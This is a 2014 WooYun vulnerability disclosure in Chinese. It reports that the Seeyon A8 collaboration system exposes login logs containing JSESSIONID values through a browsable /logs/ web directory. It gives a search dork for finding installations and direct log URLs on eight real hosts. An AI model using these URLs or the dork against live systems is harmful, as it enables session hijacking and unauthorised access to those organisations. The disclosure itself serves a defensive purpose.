致远A8协同管理系统"后门"一样的Log泄露JSESSIONID可登陆用户

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-081757

漏洞标题：致远A8协同管理系统"后门"一样的Log泄露JSESSIONID可登陆用户

漏洞作者： error

提交时间：2014-11-05 12:16

修复时间：2014-12-30 14:44

公开时间：2014-12-30 14:44

漏洞类型：敏感信息泄露

危害等级：中

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-11-05：细节已通知厂商并且等待厂商处理中
2014-11-10：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2015-01-04：细节向核心白帽子及相关领域专家公开
2015-01-14：细节向普通白帽子公开
2015-01-24：细节向实习白帽子公开
2014-12-30：细节向公众公开

简要描述：

详细说明：

由于致远A8协同管理系统会对用户登录信息进行日志记录，可是日志文件存放在web目录的logs子目录下，并且未作任何权限控制，测试发现大部分在用系统都存在logs目录遍历漏洞，因此导致致远A8协同管理系统用户登录信息无节操泄露
百度搜索：更改语言: A8企业版 (并发数:100) 用户名 : 密码: 辅助程序安装

漏洞证明：

(1)http://119.60.8.250
http://119.60.8.250/logs/


http://119.60.8.250/logs/login.log




(2) http://oa.hkfs.cn/
http://oa.hkfs.cn/logs/




http://oa.hkfs.cn/logs/2014-10-31/login.log.2014-10-31.1




(3)http://61.177.183.195/
http://61.177.183.195/logs/




http://61.177.183.195/logs/2014-10-31/login.log.2014-10-31.1




(4)http://jlgmgroup.com:8080/
http://jlgmgroup.com:8080/logs/




http://jlgmgroup.com:8080/logs/2014-10-31/login.log.2014-10-31.1




(5)http://116.249.124.188/
http://116.249.124.188/logs/




http://116.249.124.188/logs/login.log




(6)http://61.138.135.194:8080
http://61.138.135.194:8080/logs/




http://61.138.135.194:8080/logs/2014-10-31/login.log.2014-10-31.1




(7)http://211.147.237.29/
http://211.147.237.29/logs




http://211.147.237.29/logs/2014-10-31/login.log.2014-10-31.1




(8)http://122.156.217.45:8080/
http://122.156.217.45:8080/logs/




http://122.156.217.45:8080/logs/2014-10-31/login.log.2014-10-31.1